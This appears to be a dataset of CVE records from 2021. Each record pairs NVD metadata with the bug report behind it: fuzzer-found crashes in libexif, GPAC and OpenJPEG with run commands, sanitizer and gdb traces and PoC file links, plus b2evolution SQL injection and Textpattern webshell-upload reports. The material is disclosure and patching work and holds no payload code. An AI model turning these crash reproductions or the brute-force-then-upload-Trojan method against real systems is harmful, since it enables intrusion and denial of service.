[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexif/exif/commit/eb84b0e3c5f2a86013b6fcfb800d187896a648fa" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexif/exif/commit/f6334d9d32437ef13dc902f0a88a2be0063d9d1c" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libexif/exif/issues/4" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSWAXZVNXYLV3E4R6YQTEGRGMGWEAR76/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QMC6OTXZRPCUD3LOSWO4ISR7CH7NJQDT/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZQ3L45F7S7PQPG5HEHXOCGNOO64MJOS/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexif/exif/commit/eb84b0e3c5f2a86013b6fcfb800d187896a648fa" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexif/exif/commit/f6334d9d32437ef13dc902f0a88a2be0063d9d1c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libexif/exif/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSWAXZVNXYLV3E4R6YQTEGRGMGWEAR76/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QMC6OTXZRPCUD3LOSWO4ISR7CH7NJQDT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZQ3L45F7S7PQPG5HEHXOCGNOO64MJOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexif_project:exif:*:*:*:*:*:*:*:*", "matchCriteriaId": "F50641F5-B6E2-440C-8737-9E153C8BB3DA", "versionEndExcluding": null, "versionEndIncluding": "0.6.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/libexif/exif/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libexif", "exif" ]
Project: exif system: ubuntu 20.04 Fuzzer: afl_exif_out_xml [poc.zip](https://github.com/libexif/exif/files/6041133/poc.zip) Command: ``` ./exif poc.jpeg -x ``` asan ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3675403==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004cd901 bp 0x7ffd419c2ce0 sp 0x7ffd419c2300 T0) ==3675403==The signal is caused by a WRITE memory access. ==3675403==Hint: address points to the zero page. #0 0x4cd901 in escape_xml /home/hx_server/target/libexif/ASAN_exif/exif/actions.c:701:7 #1 0x4cd48a in show_entry_xml /home/hx_server/target/libexif/ASAN_exif/exif/actions.c:723:26 #2 0x7f0f5af7fedd in exif_content_foreach_entry /home/hx_server/target/libexif/libexif/exif-content.c:225:3 #3 0x7f0f5af85b71 in exif_data_foreach_content /home/hx_server/target/libexif/libexif/exif-data.c:1168:3 #4 0x4cc512 in action_tag_list_xml /home/hx_server/target/libexif/ASAN_exif/exif/actions.c:745:3 #5 0x4cf155 in main /home/hx_server/target/libexif/ASAN_exif/exif/main.c:474:4 #6 0x7f0f5ad430b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41d7cd in _start (/home/hx_server/target/libexif/ASAN_exif/exif/exif+0x41d7cd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hx_server/target/libexif/ASAN_exif/exif/actions.c:701:7 in escape_xml ==3675403==ABORTING ``` gdb ``` Program received signal SIGSEGV, Segmentation fault. 0x00000000004cd901 in escape_xml (text=<optimized out>) at actions.c:701 701 *out = '\x0'; /* NUL terminate the string */ [ Legend: Modified register | Code | Heap | Stack | String ] ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── $rax : 0x0 $rbx : 0x0 $rcx : 0x40 $rdx : 0x0 $rsp : 0x00007fffffffcc20 → 0x00007fffffffd560 → 0x0000000000000000 $rbp : 0x00007fffffffd600 → 0x00007fffffffd760 → 0x00007fffffffe240 → 0x0000000000000000 $rsi : 0x0000603000000340 → 0x34030000dc000000 $rdi : 0x00007fffffffcc60 → 0x0000000000000000 $rip : 0x00000000004cd901 → <escape_xml+737> mov BYTE PTR [rbx], 0x0 $r8 : 0x11 $r9 : 0xffffefff80008678 $r10 : 0x00007ffff7df7e56 → 0x007970636e727473 ("strncpy"?) $r11 : 0x0000000000482650 → <strncpy+0> push rbp $r12 : 0x00007fffffffd0e0 → "Manufacturer" $r13 : 0x0000000000515888 → 0x00007ffff7d916a0 → 0x00000000fbad2a84 → 0x0000000000000000 $r14 : 0x00007fffffffcc60 → 0x0000000000000000 $r15 : 0x00000ffffffff988 → 0x0000000000000000 $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffffcc20│+0x0000: 0x00007fffffffd560 → 0x0000000000000000 ← $rsp 0x00007fffffffcc28│+0x0008: 0x00007ffff7d916a0 → 0x00000000fbad2a84 → 0x0000000000000000 0x00007fffffffcc30│+0x0010: 0x00000ffffffff988 → 0x0000000000000000 0x00007fffffffcc38│+0x0018: 0x00000000004cd48b → <show_entry_xml+1131> mov rdi, rax 0x00007fffffffcc40│+0x0020: 0x0000000041b58ab3 0x00007fffffffcc48│+0x0028: 0x00000000004eb372 → "2 32 1024 5 v:709 1184 1024 5 t:709" 0x00007fffffffcc50│+0x0030: 0x00000000004cd020 → <show_entry_xml+0> lea rsp, [rsp-0x98] 0x00007fffffffcc58│+0x0038: 0x0000619000000980 → 0x0000000000000000 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x4cd8f7 <escape_xml+727> mov al, BYTE PTR [rax+0x7fff8000] 0x4cd8fd <escape_xml+733> test al, al 0x4cd8ff <escape_xml+735> jne 0x4cd950 <escape_xml+816> → 0x4cd901 <escape_xml+737> mov BYTE PTR [rbx], 0x0 0x4cd904 <escape_xml+740> mov rax, QWORD PTR [rip+0x8edd15] # 0xdbb620 <escape_xml.escaped> 0x4cd90b <escape_xml+747> jmp 0x4cd934 <escape_xml+788> 0x4cd90d <escape_xml+749> mov rdi, QWORD PTR [rip+0x8edd0c] # 0xdbb620 <escape_xml.escaped> 0x4cd914 <escape_xml+756> call 0x495c10 <free> 0x4cd919 <escape_xml+761> mov QWORD PTR [rip+0x8edcfc], 0x0 # 0xdbb620 <escape_xml.escaped> ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:actions.c+701 ──── 696 default: 697 *out = *text; 698 break; 699 } 700 } → 701 *out = '\x0'; /* NUL terminate the string */ 702 return escaped; 703 } 704 705 static void 706 show_entry_xml (ExifEntry *e, void *data) ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "exif", stopped 0x4cd901 in escape_xml (), reason: SIGSEGV ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x4cd901 → escape_xml(text=<optimized out>) [#1] 0x4cd48b → show_entry_xml(e=<optimized out>, data=<optimized out>) [#2] 0x7ffff7e08ede → exif_content_foreach_entry(content=0x603000000160, func=0x4cd020 <show_entry_xml>, data=0x7fffffffd68c) [#3] 0x7ffff7e0eb72 → exif_data_foreach_content(data=0x6060000021e0, func=0x0, user_data=0x7fffffffd68c) [#4] 0x4cc513 → action_tag_list_xml(ed=0x7fffffffcc60, p={ tag = 65535, ifd = EXIF_IFD_COUNT, machine_readable = 0x0, use_ids = 0x0, width = 0x50, fin = 0x602000000250 "poc.jpeg", set_value = 0x0, set_thumb = 0x0 }) [#5] 0x4cf156 → main(argc=<optimized out>, argv=<optimized out>) ``` -------------------------- HX from **Topsec alpha Security Team**
NullPointer in actions.c:701:7
https://api.github.com/repos/libexif/exif/issues/4/comments
4
2021-02-25T07:19:10Z
2021-04-29T03:53:41Z
https://github.com/libexif/exif/issues/4
816,161,668
4
1,838
CVE-2021-28300
2021-04-14T14:15:14.053
NULL Pointer Dereference in the "isomedia/track.c" module's "MergeTrack()" function of GPAC v0.5.2 allows attackers to execute arbitrary code or cause a Denial-of-Service (DoS) by uploading a malicious MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1702" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1702" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "5CD3BB9D-838C-4431-AF39-F279C9869726", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1702
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hi GPAC Team, The is a null pointer bug. GPAC version 0.5.2-426-gc5ad4e4+dfsg5-5 System info: Ubuntu 20.04.1 LTS, x64 , gcc 9.3.0 ## Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure $ make ``` ## Run Command: ``` $ MP4Box -def poc.mp4 ``` ## file [poc.mp4.zip](https://github.com/gpac/gpac/files/6119931/poc.mp4.zip) ## gdb info: ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff73b0ed5 in MergeTrack (trak=<optimized out>, traf=<optimized out>, moof_box=<optimized out>, moof_offset=<optimized out>, compressed_diff=<optimized out>, cumulated_offset=<optimized out>, is_first_merge=<optimized out>) at isomedia/track.c:1086 1086 if (size > key_info[3]) (gdb) bt #0 0x00007ffff73b0ed5 in MergeTrack (trak=<optimized out>, traf=<optimized out>, moof_box=<optimized out>, moof_offset=<optimized out>, compressed_diff=<optimized out>, cumulated_offset=<optimized out>, is_first_merge=<optimized out>) at isomedia/track.c:1086 #1 0x00007ffff72f4226 in MergeFragment (moof=0x4b8580, mov=<optimized out>) at isomedia/isom_intern.c:90 #2 0x00007ffff72f8071 in gf_isom_parse_movie_boxes_internal (mov=<optimized out>, boxType=0x0, bytesMissing=<optimized out>, progressive_mode=GF_FALSE) at isomedia/isom_intern.c:622 #3 gf_isom_parse_movie_boxes (mov=<optimized out>, boxType=0x0, bytesMissing=<optimized out>, progressive_mode=GF_FALSE) at isomedia/isom_intern.c:747 #4 0x00007ffff72f91da in gf_isom_open_file ( fileName=0x7fffffffe6d4 "out_mp4box_wrl/default/crashes/id:000178,sig:11,src:002654,time:6287616,op:havoc,rep:4", OpenMode=GF_ISOM_OPEN_READ, tmp_dir=0x0) at isomedia/isom_intern.c:867 #5 0x000000000042b599 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:5670 #6 0x00007ffff6d750b3 in __libc_start_main (main=0x4362a0 <main>, argc=3, argv=0x7fffffffe448, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe438) at ../csu/libc-start.c:308 #7 0x000000000040e98e in _start () ``` ## ASAN info: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3432849==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f13f563a3da bp 0x7fff8e5d0fa0 sp 0x7fff8e5d0c80 T0) ==3432849==The signal is caused by a WRITE memory access. ==3432849==Hint: address points to the zero page. #0 0x7f13f563a3da in MergeTrack /home/topsec/Downloads/gpac/src/isomedia/track.c:1087:21 #1 0x7f13f54db5c8 in MergeFragment /home/topsec/Downloads/gpac/src/isomedia/isom_intern.c:90:7 #2 0x7f13f54e190f in gf_isom_parse_movie_boxes_internal /home/topsec/Downloads/gpac/src/isomedia/isom_intern.c:622:9 #3 0x7f13f54e190f in gf_isom_parse_movie_boxes /home/topsec/Downloads/gpac/src/isomedia/isom_intern.c:747:6 #4 0x7f13f54e3dea in gf_isom_open_file /home/topsec/Downloads/gpac/src/isomedia/isom_intern.c:867:19 #5 0x4f0f92 in mp4boxMain /home/topsec/Downloads/gpac/applications/mp4box/main.c:5670:12 #6 0x7f13f46b70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x4289ed in _start (/home/topsec/Downloads/gpac/afl_build/bin/gcc/MP4Box+0x4289ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/topsec/Downloads/gpac/src/isomedia/track.c:1087:21 in MergeTrack ==3432849==ABORTING ``` --------------------------------------------- HX from **Topsec alpha Security Team**
A NULL pointer dereference in the function MergeTrack in isomedia/track.c:1087:21
https://api.github.com/repos/gpac/gpac/issues/1702/comments
3
2021-03-11T02:05:00Z
2021-04-29T05:20:07Z
https://github.com/gpac/gpac/issues/1702
828,599,474
1,702
1,839
CVE-2021-29338
2021-04-14T14:15:14.133
Integer Overflow in OpenJPEG v2.4.0 allows remote attackers to crash the application, causing a Denial of Service (DoS). This occurs when the attacker uses the command line option "-ImgDir" on a directory that contains 1048576 files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1338" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00006.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZ54FGM2IGAP4AWSJ22JKHOPHCR3FGYU/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QB6AI7CWXWMEDZIQY4LQ6DMIEXMDOHUP/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-04" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00006.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZ54FGM2IGAP4AWSJ22JKHOPHCR3FGYU/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QB6AI7CWXWMEDZIQY4LQ6DMIEXMDOHUP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-04" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "2AA6CD3E-09FE-442F-A7E5-C661960ACBCD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/uclouvain/openjpeg/issues/1338
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
Hello openjpeg2 team, I found an integer overflow vulnerability in the command line options. ``` -ImgDir ``` If there are many files in the imgdir directory The number of files read by opj_compress will overflow. openjpeg2(tested with revision * master 0bda7188b7b545232a341f1d978b1e4feda46fc2). run commd ``` ./opj_compress -ImgDir testcase/ -OutFor outcase/t.jp2 ``` asan info ``` Folder opened successfully UndefinedBehaviorSanitizer:DEADLYSIGNAL ==1852564==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000001183310 (pc 0x7ffff764cefa bp 0x0000000fffff sp 0x7fffffff3988 T1852564) ==1852564==The signal is caused by a WRITE memory access. #0 0x7ffff764cefa /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/strcpy-avx2.S:630 #1 0x42d9a5 in load_images /home/test/Downloads/openjpeg/src/bin/jp2/opj_compress.c:508:9 #2 0x429366 in main /home/test/Downloads/openjpeg/src/bin/jp2/opj_compress.c:1924:13 #3 0x7ffff74e70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x408c7d in _start (/home/test/Downloads/openjpeg/fast_build64/bin/opj_compress+0x408c7d) UndefinedBehaviorSanitizer can not provide additional info. SUMMARY: UndefinedBehaviorSanitizer: SEGV /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/strcpy-avx2.S:630 ==1852564==ABORTING ``` <img width="634" alt="image1" src="https://user-images.githubusercontent.com/25973989/112259246-ec2e9b00-8ca2-11eb-880a-a7b526647209.png"> When num_images is equal to 1048576, multiplying with OPJ_PATH_LEN will produce an overflow result of 0 [poc.zip](https://github.com/uclouvain/openjpeg/files/6194593/poc.zip) ----------------------------------------------------------------------- HX from **Topsec alpha Security Team**
Integer Overflow in num_images
https://api.github.com/repos/uclouvain/openjpeg/issues/1338/comments
10
2021-03-24T05:21:26Z
2022-01-12T12:46:11Z
https://github.com/uclouvain/openjpeg/issues/1338
839,366,507
1,338
1,840
CVE-2021-28242
2021-04-15T14:15:16.997
SQL Injection in the "evoadm.php" component of b2evolution v7.2.2-stable allows remote attackers to obtain sensitive database information by injecting SQL commands into the "cf_name" parameter when creating a new filter under the "Collections" tab.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162489/b2evolution-7-2-2-SQL-Injection.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://deadsh0t.medium.com/authenticated-boolean-based-blind-error-based-sql-injection-b752225f0644" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/b2evolution/b2evolution/issues/109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162489/b2evolution-7-2-2-SQL-Injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://deadsh0t.medium.com/authenticated-boolean-based-blind-error-based-sql-injection-b752225f0644" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/b2evolution/b2evolution/issues/109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:b2evolution:b2evolution:7.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "75BEB348-D86D-4F78-8B0F-66BB033CDDB4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/b2evolution/b2evolution/issues/109
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "b2evolution", "b2evolution" ]
Hi Team, We have identified a Critical security issue and we would like to report back to you since it is supposed to fixed **ASAP**. We tried to contact you via the b2evolution forum. Since there was no response just trying to reach you via all mode. Kindly help us with your mail id so we can report it directly to the correct person as part of responsible disclosure.
Responsible Disclosure - Security Issue
https://api.github.com/repos/b2evolution/b2evolution/issues/109/comments
13
2021-02-26T10:12:06Z
2021-05-02T10:15:02Z
https://github.com/b2evolution/b2evolution/issues/109
817,223,257
109
1,841
CVE-2021-30209
2021-04-15T14:15:17.217
Textpattern V4.8.4 contains an arbitrary file upload vulnerability where a plug-in can be loaded in the background without any security verification, which may lead to obtaining system permissions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/textpattern/textpattern/issues/1655" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/textpattern/textpattern/issues/1655" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:textpattern:textpattern:4.8.4:*:*:*:*:*:*:*", "matchCriteriaId": "398F55CB-5C6D-405D-B0A3-69A176A55785", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/textpattern/textpattern/issues/1655
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "textpattern", "textpattern" ]
Hi I found two loopholes. In version V4.8.4。 The first one: The location where the plug-in is uploaded in the background without any security verification. You can upload Trojan files to obtain system permissions. The second one: the storage type xss exists in the place where the article is written. Next are the details of the exploit: The first vulnerability: Because the backend login location does not have a verification code and no lock policy is set, if an attacker enters the backend through brute force cracking, the attacker can upload the php Trojan file, because the file path after saving is regular , So the attacker can connect to the Trojan horse file through a hacker tool to obtain system permissions. ![image](https://user-images.githubusercontent.com/54694758/111631189-13faaa80-882e-11eb-88fb-b3fb2ff9954f.png) Access to Trojan files to verify that the vulnerability exists. 